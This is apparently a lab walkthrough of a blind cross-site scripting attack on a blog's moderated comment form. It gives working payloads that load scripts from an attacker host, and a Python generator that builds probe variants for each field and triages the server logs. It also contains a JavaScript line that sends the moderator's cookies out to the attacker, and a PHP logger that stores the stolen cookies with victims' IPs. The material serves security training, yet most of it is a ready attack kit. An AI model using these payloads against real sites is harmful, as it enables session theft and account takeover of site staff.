OK, now to put it into practice. We have a security blog in front of us. Scrolling down, there's a search feature, and clicking through to a blog post lets us leave a comment via a form with multiple fields. I'll start there.
Leaving a test comment gives us a preview of it, but comments are moderated, so ours likely won't be approved. That's the blind XSS setup: we never see our payload render, but whoever reviews the moderation queue will load it in their browser, so everything we need to learn has to come back to a server we control.
OK, let's start by standing up the PHP server on our machine:
mkdir /tmp/tmpserver
cd /tmp/tmpserver
sudo php -S 10.10.10.10:7337
After sending one probe per form field, each requesting a path named after the field it was placed in, the server log shows a request for /website, so the website field is the one that fires. The leading '> closes the attribute the value lands in before opening the script tag. (Since the server listens on 7337, OUR_IP in the payloads below needs :7337 appended unless you restart the server on port 80.) The code that got the hit:
'><script src=http://OUR_IP/website></script>
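Doing this by hand for one field is fine, but it's easy to lose track of which probe produced which log line once several fields and payload variants are in play. Here's a small Python helper I'd use for that (added here, not part of the original walkthrough or the lab): it builds probes whose requested path encodes both the field name and the payload variant, then parses the PHP built-in server's log to map each hit back to them. The listener address, field names and the sample log lines are assumptions/constructed for the example, and it generalises the page's single /website probe to several fields and payload shapes.

```python
"""Blind-XSS probe generator plus log triage for PHP's built-in web server.
Added example: not code from the write-up or the lab. Host, field names and
the sample log below are assumed/constructed values."""
import re
from urllib.parse import unquote

LISTENER = "10.10.10.10:7337"   # assumption: matches `php -S 10.10.10.10:7337`

# Assumed form field names; the write-up only confirms that "website" fires.
FIELDS = ["name", "email", "website", "comment"]

# Payload variants. Each one loads a script from our listener; the requested
# path carries the field name and variant index so every hit is attributable.
VARIANTS = [
    "<script src=http://{host}/{path}></script>",
    "'><script src=http://{host}/{path}></script>",
    '"><script src=http://{host}/{path}></script>',
    "javascript:eval('var a=document.createElement(\\'script\\');"
    "a.src=\\'http://{host}/{path}\\';document.body.appendChild(a)')",
    "<script>$.getScript('http://{host}/{path}')</script>",
]


def build_probes(fields=FIELDS, host=LISTENER):
    """Return {(field, variant_index): payload} for every field/variant pair."""
    probes = {}
    for field in fields:
        for i, template in enumerate(VARIANTS):
            probes[(field, i)] = template.format(host=host, path=f"{field}/v{i}")
    return probes


# One request line from `php -S` looks like:
# [Tue Mar 12 09:15:02 2024] 10.129.5.7:48512 [404]: GET /website/v1 - No such file or directory
# Newer PHP versions also emit "... Accepted" and "... Closing" lines, which we skip.
LOG_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\]\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3}):\d+\s+"
    r"\[(?P<status>\d{3})\]:\s+(?P<method>[A-Z]+)\s+(?P<path>\S+)"
)
PATH_RE = re.compile(r"^/(?P<field>[A-Za-z0-9_-]+)/v(?P<variant>\d+)(?:[/?].*)?$")


def triage(log_text):
    """Map each probe request in the log back to (field, variant, victim IP, time)."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # Accepted/Closing lines or unrelated noise
        p = PATH_RE.match(unquote(m["path"]))
        if not p:
            continue  # favicon, the cookie logger itself, etc.
        hits.append({
            "field": p["field"],
            "variant": int(p["variant"]),
            "ip": m["ip"],
            "ts": m["ts"],
        })
    return hits


# Constructed sample log, in the shape `php -S` writes to stdout.
SAMPLE_LOG = """\
[Tue Mar 12 09:15:02 2024] 10.129.5.7:48512 Accepted
[Tue Mar 12 09:15:02 2024] 10.129.5.7:48512 [404]: GET /website/v1 - No such file or directory
[Tue Mar 12 09:15:02 2024] 10.129.5.7:48512 Closing
[Tue Mar 12 09:15:03 2024] 10.129.5.7:48514 [404]: GET /favicon.ico - No such file or directory
[Tue Mar 12 09:15:04 2024] 10.129.5.7:48516 [200]: GET /index.php?c=session%3Dabc123
[Tue Mar 12 09:16:10 2024] 10.129.5.7:48530 [404]: GET /comment/v0 - No such file or directory
"""

if __name__ == "__main__":
    for (field, i), payload in build_probes().items():
        print(f"{field:8} v{i}: {payload}")
    for hit in triage(SAMPLE_LOG):
        print(f"HIT field={hit['field']} variant=v{hit['variant']} from {hit['ip']} at {hit['ts']}")
```

Paste each generated payload into its own field, submit the comment, and once the moderator opens the queue the triage output tells you not just that something fired but which field and which injection context (raw tag, broken-out single quote, broken-out double quote, href, jQuery) worked, which is exactly what you need to pick the shape of the real data grabber.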
For the data grabber, I'm going to use the website field, since it's less obvious than the comment body. The script runs in the moderator's browser and sends their cookies to our server as a query parameter. We'll save this as script.js:
// runs in the moderator's browser: send document.cookie to our logger via the c= parameter
document.location='http://OUR_IP/index.php?c='+document.cookie;
We'll then inject this in the website field to load it:
<script src=http://OUR_IP/script.js></script>
We'll reuse the example cookie-stealer logger from before and save it as index.php:
<?php
// Cookie logger: the victim's browser hits /index.php?c=<document.cookie>;
// each cookie is appended to cookies.txt alongside the victim's IP.
if (isset($_GET['c'])) {
    $list = explode(";", $_GET['c']);
    foreach ($list as $key => $value) {
        $cookie = urldecode($value);
        $file = fopen("cookies.txt", "a+");
        fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
        fclose($file);
    }
}
?>
We submit the form, and once the moderator views the comment the cookie lands in cookies.txt - sweet!